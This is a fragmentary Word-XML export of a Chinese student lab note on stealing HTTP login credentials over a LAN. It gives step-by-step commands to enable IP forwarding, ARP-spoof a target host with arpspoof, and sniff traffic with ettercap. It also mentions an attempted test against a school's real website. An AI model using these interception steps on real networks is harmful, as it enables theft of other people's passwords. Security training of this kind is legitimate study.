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综合应用之HTTP账号密码获取：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Arpspoof  ——欺骗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Ettercap  —— 欺骗   DNS欺骗   流量嗅探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目标机器IP：192.168.136.130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目标机器网关：192.168.136.2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Kali攻击者：192.168.136.129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kali攻击者网卡：eth0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任务：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1&gt;进行IP流量转发：echo 1 &gt;/proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2100"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="6431-1563785326502"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注意：Echo写命令，没有任何的显示</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="9686-1563786304846"/>
      <w:bookmarkEnd w:id="1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2&gt;Cat查看内容 ：cat /proc/sys/net/ipv4/ip_forward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如果下方显示“1”，则执行成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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t>继续执行：arpspoof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</w:rPr>
        <w:t>- i 网卡 -t 目标 IP 网关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340225" cy="197929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43" t="342" r="1958" b="10702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840" w:hangingChars="3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>查看windows系统的网关：arp -a,如果是动态的说明欺骗成功，上面两个地址一模一样，则会把kali的地址当成网关，流量就会因此经过这里。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重新打开一个终端，执行Ettercap -Tq -i eth0 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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-Tq  —— 启动文本模式，q为安静模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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-i   后面跟网卡</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="840" w:firstLineChars="400"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3749040" cy="14624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由于没有找到比较小型的网站，测试失败（用学校官网测试的）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还有可能是因为登陆的方式是：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882140" cy="134874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54250" cy="903605"/>
            <wp:effectExtent l="0" t="0" r="127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不是用户名+密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="840" w:firstLineChars="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="840" w:firstLineChars="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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注意：当登录名为</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中文时，会出现乱码，复制url解码，百度搜索“URL解码”，直接粘贴进去，就会出现对应的中文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33507"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6AE33507"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1&gt;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03B8A"/>
    <w:rsid w:val="027C300C"/>
    <w:rsid w:val="195133A8"/>
    <w:rsid w:val="1FAA7C0A"/>
    <w:rsid w:val="20E12298"/>
    <w:rsid w:val="22BE2544"/>
    <w:rsid w:val="2BF37DC4"/>
    <w:rsid w:val="44662D70"/>
    <w:rsid w:val="57C03B8A"/>
    <w:rsid w:val="77EC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2019-07-22T10:15:00Z</dcterms:created>
  <dc:creator>柠檬不萌</dc:creator>
  <cp:lastModifiedBy>柠檬不萌</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-22T13:38:48Z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